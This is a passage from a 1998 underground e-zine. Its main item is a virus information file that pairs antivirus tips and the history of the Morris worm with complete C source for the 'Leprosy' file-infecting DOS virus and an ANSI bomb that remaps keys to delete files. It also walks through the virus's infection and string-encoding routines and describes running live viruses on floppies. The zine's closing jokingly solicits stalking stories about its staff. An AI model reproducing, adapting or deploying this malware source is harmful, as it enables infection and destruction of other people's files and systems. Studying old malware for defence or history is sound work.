computer to the extreme then they should do just that. Push their COMPUTER
to the extreme. Not rack their brains for hours on end and eventually wind
up in that void I talked about earlier. Hacking is about getting into
computers...hmm..so if you know about your own computer allot then
maybe...just maybe it makes it possible for you to get into another
computer. There's a thought. Then you don't have to read all those hyped
technical manuals that you get bored reading. Instead you can have fun and
do things. Sounds better to me.
This is not a guide "how to hack" if you don't already know. I plan to write
a page about how the hacking society has turned into something like the US
Government which hackers supposedly dislike. Why? Because its corrupt and
power-hungry. In the end all things made by humans or used by humans or
organised by human's turns into something like that. So forget listening to
others. Do things your way. If you don't want to read this text or that or
set up Linux, then don't. There are no requirements for being a hacker. If
there were then I'm sure that the hacker society would go form a new
country and label it "copy of the US Gov." But no. It hasn't got that bad
yet. So learn while you can. Maybe it will help you out in life. Or maybe
you will end up in the cage with murderers and rapists. I dunno. Would that
be fun? Thats what happens if you try to hard to learn too fast. So back to
the original idea of just losing the generally thought idea of how to hack
and just learning computers.
If you really want some quick tips on becoming a hacker in non-conventional
ways then here they are. Get like 2 or 3 computers. Windows is fine. They
can be cheap ones. Then read up on networking. Maybe set up a TCP-IP
network between these three computers. Then access one of these other
computer from DOS. Well good. You have knowledge of TCP-IP [the basis of
the internet], DOS [how many million lines of UNIX code are in DOS??], and
some lovely problem solving skills. There. You know some good stuff now!
Maybe you want to add to your home network. Add some interesting things
here and there and try them out. You can learn more every day. Maybe you
want to try to put a Macintosh on your network. Hmm...Read up on it. Talk
to some people. Once you have that then you are quite knowledgable! What
next? Maybe some UNIX variance. By now you have heard about it. The free
operating system [Linux] which you can put on an old 486 and hook up to
your network too. There. Unix, Mac, TCP-IP, Windows, Problem Solving,
Hardware skills. All lumped together. Then maybe, just maybe you want to
host your very own networking help website on your very own network. Set up
a server, and get a domain name and configure, configure, configure. That
definitely adds to your knowledge! Fun. Now you know a whole bunch about
hacking [you didn't even know it?] without having to go to ONE site with
those flaming skulls. Good for you.
I hope this text has made you think. It sure made me. All my ideas and
anger on paper [what SHOULD I call it?] and enough information to get you
in action. I haven't said once that you have to do anything. And you don't.
Just go your own route. The network I talked about WOULD help you out. And
it would be fun to build [and have]. So make your own decisions and keep
thinking!
-Digital Avatar 9.23.98
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 9 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Virii--Shit:
A Virus Information Text File
By Kleptic
CREDITS:
-------------------------------------------------------------
Author............................................Kleptic <tm>
Editor............................................Kleptic <tm>
Ideas, Source, Examples Supplied By...............Kleptic <tm>
Facts Stolen From Several Sources By..............Kleptic <tm>
-------------------------------------------------------------
Introduction:
Welcome to my really long text file on Virus information and safety.
I have always had a fascination of computer virii, since I first heard the
word. I, like a lot of people, had no idea what they were about, and was
extremely curious. And this text file will cover my process as I find out
more about them. How they are written, why they act like they do, and if
possible, why people would write them.
In This File:
Prevention And Protection Methods
The "Internet Worm"
Trojans, Worms, Virii, Ansi Bombs: What's the difference?
Benign VS Malignant Virii
Sample Source Code Of Virii
Discussion Of The Infection And Encryption Methods Used By "Leprosy"
The "Uncompress" Virus
"Suicidal Tendencies" Department/Virus Of The Month
Discussion Of Anti Viral Software
Things You Should Know
-----------------------------------------------------------------------------
Prevention And Protection Methods:
-----------------------------------------------------------------------------
After the infamous "Michealangelo" panic, I realised what the masses are
lacking is virus literacy. If people had a understanding of them, and knew
the appropriate methods of prevention, and dealing with a infection, the
situation would've never been blown out of proportion like it was. When I
hear people ask questions such as "If I Put My Toothbrush Near A Infected
Disk, Will I Catch The Virus When I Brush My Teeth?" I have to laugh...Ok,
maybe that example is a little exaggerated, but some of the questions are
hitting close to that level of stupidity, so here are some protection and
prevention methods:
1. If you download a file from a public BBS, or a friend gives you a file
that he downloaded from somewhere, be sure and uncompress the file onto
a floppy and run your virus scanner on it. NEVER run a new file without
checking it first. Some people believe a virus scanner can spot a file
that is infected within a compressed file by running the virus scanner
on it, this is NOT true. You have to decompress the file first.
By doing this, you are dropping your chances of infection considerably
BUT there is always the chance of a unknown virus that the scanner won't
spot so that is why you have to ALWAYS have a backup of all your data on
tape or disk. That way if the unknown virus wipes your hard drive, you
have the backup and nothing is lost.
2. In the event of a virus infection, shut your computer off immediately and
wait 10-20 seconds. NEVER do a "warm boot" (CTRL-ALT-DEL) because some
virii can survive through a warm boot. Always do a "cold boot" (Shut the
computer OFF). After the 10-20 seconds, boot your computer from a CLEAN
WRITE PROTECTED DOS Bootable disk, and then run your virus scanner from
a WRITE PROTECTED disk. (The reason for having the disks write protected
is just in case the virus is still lurking around, it won't be able to
write itself and infect the floppies). If the virus is a known one, have
the virus scanner either fix the infected files, or delete them (and
replace from your backup) or make a note of the infected files and erase
them manually.
3. How do you spot a attack by a unknown virus?
A) Change in sizes of files
B) Change of file dates/times
C) Deleted files
D) Slower processing time
E) Unusual messages
F) Disk activity, more than usual (Writing to the disk when it's not
necessary)
4. What to do in the event of a unknown virus attack?
A) Follow steps of shutting machine off and re-booting as outlined in
#2
B) Run your virus scanner and have it look for files that changed in
size or date (if your scanner has a feature that makes note of
original virus sizes/dates/times)
C) If your virus scanner doesn't make note of original sizes/dates/times
you can always make note of them manually and then check them yourself.
It's time consuming, but can prevent serious damage to your data, and
you should try to isolate a infected file and send it to ME (info on
how to get it to me at the end of the newsletter) so I can attempt to
dissect it and notify the appropriate person of the new virus.
D) Some virus scanners come with a TSR that will prevent any writing to
disk, it will pop a window or message on the screen saying: Attempting
to write to <filename> Do you wish to do so? If something is trying to
write to a file that shouldn't be written to at that time, chances are
you are dealing with a unknown virus and should say no. Then try to
find and isolate the virus.
E) How do you spot a unknown virus or a known virus without running
a virus scanner?
1) Most virii are tiny (2 kilobytes to 10 kilobytes) and the majority
of them are .COM files so if you have, let's say, a 6K .COM file
that claims to be a "awesome game" I'd be a little bit suspicious.
2) Weird names. I would not run "DIE.COM" or "KILLER.COM" and over
the years I have run into files named that, when people tried to
infect my computer. At least they could've named it something else
not so obvious.
3) As stated in #1, the MAJORITY of them are small .COM files but they
can be .EXE files as well, and bigger then 10K.
All it takes is a little bit of common sense, and 99% of what could've been
virus attacks on your computer can be prevented. All you have to remember is
that they cannot infect your machine unless run first...BUT there is one
virus out there that, when uncompressed, activates itself. This virus does
NOT have to be executed in order to infect your machine, and it will be
discussed later on. In the event of where this "uncompress" virus wipes some
of your data, or any other virus, that's what backups are for. ALWAYS HAVE A
BACKUP OF YOUR HARD DRIVE and NEVER put a floppy in the drive and run a
program when there is a virus in memory because, chances are, that floppy
will get ruined/infected as well, unless it is write protected. The instant
you are aware of a infection, shut the machine off! Because there are some
virii that, upon finding a write protected floppy that it cannot infect, or
something else it can't do, "get mad" and cause destruction.
-----------------------------------------------------------------------------
The "Internet Worm"
-----------------------------------------------------------------------------
This has to be the most widely publicised case of a virus attack ever.
On 10/02/88, Robert Morris, a graduate student, wrote and released a worm
that infected "Internet" the world-wide network. Within hours, it infected
thousands of computers. The worm was benign, not causing any damage to files
or media, but replicated itself over and over rapidly, and resulted in the
computers on Internet having to be shut down and all copies of the worm
removed. Some of the hosts were still disconnected from the network eight
days later, showing the impact this worm had. Morris claimed he did it as a
experiment, and made a mistake in how fast it actually would replicate. The
media, namely NY Times, USA Today, and The Wall Street Journal, gave the worm
front page coverage. On November 4th, teams at several institutions went to
work and successfully "decompiled" the worm and studied it in the language it
was written in, "C language", but the source code was never released for fear
of hackers using the source for malicious purposes. In the end, Morris was
removed from school, ordered to pay $10,000 in fines, perform 400 hours of
community services and was on 3 years probation. Some people argued as to
whether or not Morris was guilty because he evidently didn't do it to cause
damage, but rather as a experiment that went wrong.
What the worm did: It hacked it's way into hosts attached to the internet by
cracking passwords and then replicated itself rapidly, taking up all the
memory and forcing the hosts to be shut down.
-----------------------------------------------------------------------------
Trojans, Worms, Virii, Ansi Bombs: What's the difference?
-----------------------------------------------------------------------------
Trojans: Programs disguised as a useful program or a existing real program
that can cause damage on your system.
Worms: Benign virii, rarely causing damage to media or files, such as the
Internet worm.
Ansi Bombs: Tiny programs that use ANSI to remap your keyboard causing keys,
when pressed, to do other things.
Example: If a Ansi bomb was in memory, and it remapped the "K" key to erase
all the files in the current directory, as soon as you pressed K
the files would be gone. Usually when you type C>ERASE *.*
MS-DOS will respond with: All the files in the current directory
will be deleted! Are you sure (y/n)?
Some Ansi bombs are intelligent and can prevent such DOS messages
from appearing.
-----------------------------------------------------------------------------
Here is the source code to a simple Ansi bomb:
-----------------------------------------------------------------------------
#include <stdio.h>
#define KILL(K, S) printf("\033[0;%d;\"%s\";13p", K, S)
#define F1 59
#define F2 60
#define F3 61
#define F4 62
main()
{
KILL(F1, "DEL *.ZIP");
KILL(F2, "DEL *.ARJ");
KILL(F3, "DEL *.COM");
KILL(F4, "DEL *.EXE");
}
-----------------------------------------------------------------------------
This just assigns the string (DEL *.ZIP etc) to the respective keys. If this
Ansi bomb was in memory, and you pressed F1, it would delete all the files
in the current directory with the extension of .ZIP. The command (DEL *.ZIP)
would appear on the screen though, and you could use a file recovery program
to recover the deleted files. There are more lethal Ansi bombs, ones that can
format your hard drive and other such destructive acts.
Prevention: Use NANSI or ZANSI rather than ANSI and the Ansi bombs won't work.
-----------------------------------------------------------------------------
Virii: Destructive programs that use 'stealth' techniques, and can replicate.
Not All virii are destructive, some can be benign, and just pop up
annoying messages time to time or slow down system speed.
-----------------------------------------------------------------------------
No more will be discussed of ANSI Bombs or Trojans as this newsletter is
dedicated entirely to virii.
-----------------------------------------------------------------------------
Benign VS Malignant Virii:
-----------------------------------------------------------------------------
Benign Virii do not cause damage but do things such as take up all the memory,
slow processing speed down, and send annoying messages to the console, or the
printer, etc...
Malignant, or Malicious, Virii cause actual destruction, deleting files,
destroying the FAT or boot sector, locking up the computer, formatting disks
or hard drives, etc...
-----------------------------------------------------------------------------
Virus Source Code:
-----------------------------------------------------------------------------
Now for the real thing, we will start with the C Language source code to the
"Leprosy" Virus.
-----------------------------------------------------------------------------
#pragma inline
#define CRLF "\x17\x14" /* CR/LF combo encrypted. */
#define NO_MATCH 0x12 /* No match in wildcard search. */
char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};
struct _dta /* Disk Transfer Area format for find. */
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */
const char filler[] = "XX"; /* Pad file length to 666 bytes. */
const char *codestart = (char *) 0x100; /* Memory where virus code begins. */
const int virus_size = 666; /* The size in bytes of the virus code. */
const int infection_rate = 4; /* How many files to infect per run. */
char compare_buf[20]; /* Load program here to test infection. */
int handle; /* The current file handle being used. */
int datestamp, timestamp; /* Store original date and time here. */
char diseased_count = 0; /* How many infected files found so far. */
char success = 0; /* How many infected this run. */
/* The following are function prototypes, in keeping with ANSI */
/* Standard C, for the support functions of this program. */
int find_first( char *fn );
int find_healthy( void );
int find_next( void );
int healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );
/*----------------------------------*/
/* M A I N P R O G R A M */
/*----------------------------------*/
int main( void ) {
int x = 0;
do {
if ( find_healthy() ) { /* Is there an un-infected file? */
infect(); /* Well, then infect it! */
x++; /* Add one to the counter. */
success++; /* Carve a notch in our belt. */
}
else { /* If there ain't a file here... */
_DX = (int) ".."; /* See if we can step back to */
_AH = 0x3b; /* the parent directory, and try */
asm int 21H; /* there. */
x++; /* Increment the counter anyway, to */
} /* avoid infinite loops. */
} while( x < infection_rate ); /* Do this until we've had enough. */
if ( success ) /* If we got something this time, */
print_s( fake_msg ); /* feed 'em the phony error line. */
else
if ( diseased_count > 6 ) /* If we found 6+ infected files */
for( x = 0; x < 3; x++ ) /* along the way, laugh!! */
print_s( virus_msg[x] );
else
print_s( fake_msg ); /* Otherwise, keep a low profile. */
return;
}
void infect( void ) {
_DX = (int) dta->filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}
int find_healthy( void ) {
if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
return 0; /* Otherwise, say so. */
}
int healthy( void ) {
int i;
datestamp = dta->datestamp; /* Save time & date for later. */
timestamp = dta->timestamp;
open_handle( dta->filename ); /* Open last file located. */
_BX = handle; /* BX holds current file handle. */
_CX = 20; /* We only want a few bytes. */
_DX = (int) compare_buf; /* DX points to the scratch buffer. */
_AH = 0x3f; /* Read in file for comparison. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close the file. */
for ( i = 0; i < 20; i++ ) /* Compare to virus code. */
if ( compare_buf[i] != *(codestart+i) )
return 1; /* If no match, return healthy. */
diseased_count++; /* Chalk up one more fucked file. */
return 0; /* Otherwise, return infected. */
}
void restore_timestamp( void ) {
_AL = 0x01; /* Keep original date & time. */
_BX = handle; /* Same file handle. */
_CX = timestamp; /* Get time & date from DTA. */
_DX = datestamp;
_AH = 0x57; /* Do DOS service. */
asm int 21H;
return;
}
void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}
int find_first( char *fn ) {
_DX = (int) fn; /* Point DX to the file name. */
_CX = 0xff; /* Search for all attributes. */
_AH = 0x4e; /* 'Find first' DOS service. */
asm int 21H; /* Go, DOS, go. */
return _AX; /* Return possible error code. */
}
int find_next( void ) {
_AH = 0x4f; /* 'Find next' function. */
asm int 21H; /* Call DOS. */
return _AX; /* Return any error code. */
}
void open_handle( char *fn ) {
_DX = (int) fn; /* Point DX to the filename. */
_AL = 0x02; /* Always open for both read & write. */
_AH = 0x3d; /* "Open handle" service. */
asm int 21H; /* Call DOS. */
handle = _AX; /* Assume handle returned OK. */
return;
}
void close_handle( void ) {
_BX = handle; /* Load BX register w/current file handle. */
_AH = 0x3e; /* Set up and call DOS service. */
asm int 21H;
return;
}
-----------------------------------------------------------------------------
With source code discussed in this text file, main areas covered will be on
encryption techniques, how the virus infects files, how they 'replicate'
and 'breed' and how 'stealth techniques' are implemented in the code.
In this case we will cover how the virus infects the files and encrypts.
-----------------------------------------------------------------------------
Infection Method:
-----------------------------------------------------------------------------
void infect( void ) {
_DX = (int) dta->filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}
-----------------------------------------------------------------------------
void infect( void ) is just what he named this function.
The function will return nothing, and be called with no parameters as the two
"voids" suggest.
Register DX points to the filename as declared in the structure "_dta"
-----------------------------------------------------------------------------
_dta structure:
-----------------------------------------------------------------------------
struct _dta
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80;
-----------------------------------------------------------------------------
Next in the "infect" function, 0x00 is assigned to the CX register.
With function 43H in assembly, register CX is assigned with the bit of the
attribute that you want to set the file to.
Bit: Attribute:
0 Read Only
1 Hidden
2 System
3-4 Reserved
5 Archive
6-15 Reserved
Because the author assigned 0x00 to CX, none of the above attributes were set
on the file, allowing it to be written to.
Next in the "infect" function is 0x01 being assigned to register AL
0x01 is telling the program we want to SET attributes.
Then following that is: 0x43 being assigned to AH
Which is telling the program we want to use function 43H (Get/Set Attributes)
The current handle is assigned to register BX
The size of the virus code, or the number of bytes to write, stored in the
integer "virus_size" is assigned to register CX
virus_size is declared and initialised at the beginning of the source code
as a integer with the value "666"
Then the virus code is written to the file, the file is closed and the
original date and time the file had are restored.
-----------------------------------------------------------------------------
The Method Of Encryption:
-----------------------------------------------------------------------------
void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}
-----------------------------------------------------------------------------
The above function used in "Leprosy", called "print_s" accepts one parameter,
a string of text, like these ones defined at the beginning of the Leprosy
source code:
-----------------------------------------------------------------------------
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};
-----------------------------------------------------------------------------
Note: CRLF is defined as "\x17\x14" at the beginning of the source, \x17
being the hexadecimal code for a carriage return and \x14 the code for a line
feed.
-----------------------------------------------------------------------------
When a string is passed to the "print_s" function, it is un-encrypted.
print_s(virus_msg[0]);
print_s(virus_msg[1]);
print_s(virus_msg[2]);
would result in the following being printed to the screen:
------------------------------------------------------------
NEWS FLASH!! Your system has been infected with the
incurable decay of LEPROSY 1.00, a virus invented by
PCM2 in June of 1990. Good luck!
-----------------------------------------------------------
The compiler I currently use does not accept inline assembly
code as the author of leprosy had in his source so I modified
the "print_s" function so I could compile it:
For those interested, I use Microsoft Quick C (C) Microsoft
-----------------------------------------------------------
/* NOTE: I removed the . from the end of each message because that is */
/* A $ when un-encrypted, and the $ to terminate the string is only */
/* required for the assembly version of the "print_s" function */
/* Also: The hexadecimal constants in the strings are as follows: */
/* \x13 = TAB, \x7f = u, \x83 = y, \x81 = w, \x80 = v */
#include <stdio.h>
#define CRLF "\x17\x14"
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14"
};
void print_s (char *s);
int main (void);
main()
{
print_s(virus_msg[0]);
print_s(virus_msg[1]);
print_s(virus_msg[2]);
}
void print_s (char *s) {
char *p = s;
while ( *p ) {
*p -= 10;
p++;
}
printf("%s\n",s);
}
-----------------------------------------------------------------------------
- p -= 10; is what does it all. It adds the value of 10 to each character and
can be used either way, to unencrypt or to encrypt.
if you change it to: *p += 10;
it will then encrypt.
You can also change it to:
- p -= rand() % 35000; /* #include <stdio.h> for "rand()" */
and it will change the value it uses to encrypt or un-encrypt everytime it
passes through the "while" loop or you can change it to any value you like.
-----------------------------------------------------------------------------
This method of encryption can be used to encrypt files, file allocation
tables, boot sectors, etc. All you need is a function that reads and writes
either of the three. For instance, read the contents of the File Allocation
Table, and pass the string(s) through the print_s function and then write
the encrypted string(s) back to the File Allocation Table. I don't suggest
doing this to your hard drive, or anyone elses, for it will result in either
you or the other person having to crack the encryption and restore the FAT
manually, or formatting the hard drive and replacing all the files. If you
want to experiment, do it on a floppy, like I did.
-----------------------------------------------------------------------------
The "uncompress" virus
-----------------------------------------------------------------------------
According to the person who uploaded it to the BBS where I got it from, this
virus infects when you uncompress the file.
I did not find any indication of this when I uncompressed the file, called
NJERU.ARJ. It is a Arkanoid II: Revenge Of Doh crack released by FiRM that
is infected with a strain of Jerusalem-4.
I ran it and Norton Anti Virus (C) Symantec reported the virus in memory.
I then proceeded to run EDLIN.EXE (C) Microsoft, SYS.COM (C) Microsoft,
COMMAND.COM (C) Microsoft, and ARJ.EXE (C) Robert K. Jung to see what would
happen. These are the results:
Filename: Original Size: Size After Infection:
EDLIN.EXE 14,121 bytes 15,936 bytes
ARJ.EXE 98,968 bytes 100,784 bytes
SYS.COM 13,440 bytes 15,253 bytes
There were no size changes to COMMAND.COM, nor was it infected.
A file was also created by the virus called "NJVR._OO" that was around 26K
but only had one line in it, a error message concerning the media of the disk.
Sorry, the exact size of the file NVJR._OO and the exact message are not
available. When I attempted to remove the apparent text file using the
MS-DOS "DEL" command, it displayed the error message and tried to write to
drive A which was write protected at the time. Then it went back to drive B
and apparently did damage to the media. I formatted the disk and it was fine
afterwards. I have never seen anything like this before, a text file being
able to do damage just by attempting to delete it. I guess it wasn't a text
file after all but I still have no idea how it managed to corrupt the media
on drive B. It also created a file called "N" which was 0 bytes and couldn't
be deleted or read by Norton Anti Virus.
-----------------------------------------------------------------------------
"Suicidal Tendencies" Department.
(Appropriately named department: I can't believe I am deliberately running
a virus on my system)
This section of the newsletter will cover what happened when I run a virus
on a floppy with MSDOS.SYS, IO.SYS, COMMAND.COM, a overlay file, a .EXE file
and a few other assorted files on it.
The virus of the month award goes to: The Perfume Virus
-----------------------------------------------------------------------------
What Happened:
-----------------------------------------------------------------------------
Filename: PERFUME.COM Filesize: 806 bytes
Ok, I placed this file on drive B with the following files:
Filename: Original Size:
----------------------------------
COMMAND.COM 47845
MSDOS.SYS 37394
IO.SYS 33430
ANSI.SYS 9029
RAMDRIVE.SYS 5873
CONFIG.SYS 39
UNDELETE.EXE 13924
AUTOEXEC.BAT 69
15ALL05.DEF 67278
MICHEL.DEF 456
NSETUP.OVL 876
PKUNZIP.EXE 23528
----------------------------------
When I ran PERFUME.COM, it displayed the message: This is a tiny COM program.
and it infected COMMAND.COM, enlarging it by 765 bytes to 48,610 bytes.
It then proceeded to remove the hidden/system attribute from MSDOS.SYS but
didn't infect it and then attempted to infect the disk in drive A, which was
write protected at the time. The virus, realizing it couldn't write to drive
A, displayed the message:
Not ready reading drive A
Insert disk with \COMMAND.COM in drive A
Press any key to continue . . .
Now, usually when DOS displays that message, it only needs to READ, and still
could've if the disk was write protected, so evidently the virus was
trying to outsmart me and fool me into thinking that was a DOS message so it
could infect at least one more disk.
I ran Norton Anti Virus v2.0 (C) Symantec, and it reported Perfume in memory
so I re-booted and ran NAV again, this time it didn't report the virus being
in memory, but did identify COMMAND.COM and PERFUME.COM as being infected.
Also:
In my search for the virus of the month, I came across a file called
"ISRAELI.ZIP" which I thought to be a virus called "Israeli" but as it turns
out it was a strain of Jerusalem-4, the same as the supposed "Uncompress
virus" discussed earlier. The file was called: SORTINFT.EXE and was 3760
bytes. When I ran it, it did no damage to the disk or files but NAV did
report Jerusalem-4 in memory so I re-booted. I then ran NAV again and when
the screen came up saying who the copy of NAV was registered to, it said:
Registered To:
Kracked Phile <tm>
Weird eh? And that's not all, I went to scan memory, and the little window
came up that it displays the name of the current virus being scanned for, but
that's it, no names were displayed. The program appeared to freeze up, and
the disk kept spinning with the drive light on. I re-booted once again and
ran NAV again. The weird letters were still there but it scanned memory no
problem this time. I exited it from NAV and went to drive B to delete files
when I noticed a file called: NRVN E._OO that was 4096 bytes long. Since when
does DOS allow spaces in filenames? As a result I couldn't view it or delete
it by typing: C>DEL NRVN E._OO so I typed: C>DEL *._OO and that worked. At
one point a message also came up on the screen: "File Allocation Table Bad,
Drive B". I imagine Jerusalem-4 was responsible for the weird file name and
the bad FAT on drive B. I have no idea why NAV was acting funny, possibly
a genuine disk error and not due to a virus, since the disk was always write
protected.
-----------------------------------------------------------------------------
Well, that's it for "Suicidal Tendencies" for this month!
I don't recommend trying this on any computer with a hard drive. I do not have
a hard drive on the machine I do my experimenting on, so if I am careful and
keep the virus isolated to one disk, I have nothing to worry about.
-----------------------------------------------------------------------------
Anti Viral Software:
-----------------------------------------------------------------------------
Here are some nice virus scanners/anti viral programs to check out:
-----------------------------------------------------------------------------
Scan v89b (C) McAfee - available on most Public Domain BBSes
Clean v89b (C) McAfee - available on most Public Domain BBSes
Norton Anti Virus v2.0 (C) Symantec
Central Point Anti Virus (C) Central Point Software
There are a few others, but I think the above four are the best. I use
Norton Anti Virus and Scan.
-----------------------------------------------------------------------------
Some things you should know:
-----------------------------------------------------------------------------
Most people assume that a hard drive in a newly purchased computer, or a new
program still in the shrinkwrap are always virus free. Well, this is just not
true. The reported cases are few and far in between, but today anything can
happen, and it has. A certain computer company shipped out 500 of their
computers infected with the Michaelangelo virus, which started the whole
panic in the first place. And there have been a few times where someone bought
a brand new program, took it home and started using it, not expecting it to
be infected with a virus. Well, it was. After all, people create virii and
people work at computer companies, and software distributors. So what's
stopping a pissed off employee from infecting a computer or a program? Nothing
at all.
How you take this information is entirely up to you.
If you call a BBS and they say they scan for virii, don't assume that every
single file will be virus free, some can sneak through. There is also the
possibility of a unknown virus that was not detected by the scanner.
Last but not least: ALWAYS BACK UP YOUR DATA!!!
Philosophy Dept:
"Knowledge is power" - Francis Bacon, 16th Century Philosopher
"Even if a computer is locked, sealed in concrete, placed in a lead room and
surrounded by armed guards, I'd still have my doubts."
Those aren't the exact words and I forget who said that, but it is quite
appropriate and all too true.
I hope you enjoyed this issue of "Viriisearch" The newsletter dedicated
entirely to computer virii.
Until Next Time......Be Careful!!!
-= Kleptic =-
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 10:::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Conclusion:
We've picked ourselves up off the ground and dusted ourselves off,
the next issue is already shaping up well, we'll be unveiling the
results of our insane competitions. Details of new sections will be
in the next issue as well as various other exciting things. These
will include a Review of the upcoming Mitnick Movie - 'TakeDown',
'Eluding Unix Authentication' and an interview with other notorious
underground figures.
Now, announcing two DoJ competitions, 'Cheesy ASCII Art' and
'Stalk the Staff'. The ASCII Art competition was inspired by Rue
asking his friend bedlam if he wanted to do a little ASCII map
for people going to the Dublin 2600 meeting (the answer is
unprintable). For the Art competition we're looking for dodgy
art of a purely ASCII nature, self portraits, maps, sexual
innuendo, anything remotely ASCII like really. The best selection
(or anything we get if it comes down to it) will be published in
either next issue or at our convenience. The winner receives a
free lifetime subscription to the DoJ and the respect an admiration
of everyone for his elite ASCII skillz. Send your ASCII submissions
to ascii@Rue-the-Day.net and we'll laugh hideously at your vague
attempts...
'Stalk the Staff' is inspired by various people we
know and the maniacs who shamelessly harass them online (and from
personal experiences of one of the editors). By the way, we mean
'maniacs' in the nicest possible way. For the stalking competition
we're basically looking for all you people out there that get off
on disturbing minor underground celebrities, like ourselves, to
send us emails of your insane (inane?) rants and raves. We're also
looking for amusing stalker stories from anyone who has them. If
you really want to send decapitated soft toys with 'Rue' written
on them or whatever then take a photo instead as we aren't big into
snail mail. All submissions welcomed, get stalking people! Send the
submissions to stalkers@Rue-the-Day.net and you'll never hear from
us again...
Well, there you have it. The first issue of The DoJ. Be sure
to look out for future issues as they are on their way. But
to make sure we get there, we need your help. Fiction, articles,
poetry, stories, fact, rumour, advice and even letters will
all help get the nest issue out. Rue and myself wrote a lot for
this issue, but in the future we hope to be able to leave most
of it in your hands. Submit anything remotely underground that
you might have. Underground instructions, warning, tales or
whatever else you have.
This issue wouldn't have been possible without the help of
ethercat for the site, rOTTEN for the art, Digital Avatar and
Kleptic for their submissions. Thank you and also if you have
an underground site or newsletter worth a mention than contact
us. You can mail the DoJ at discordia@Rue-the-Day.net and we
will reply as soon as possible.
Nothing more really to be said, hope you enjoyed Issue 0 and
got something from it. Preferably not contageous. The following
cultural content helped inspire us; The Dead Kennedys, Placebo,
Scraping Foetus off The Wheel, A Tribe Called Quest, The Smashing
Pumpkins, La Haine, Albino Alligator and Things to Do in Denver
When You're Dead.
Thanks and cya next time...
And remember not to eat those big white mints !
Hail Discordia !
Cronus and Rue-the-Day
Editors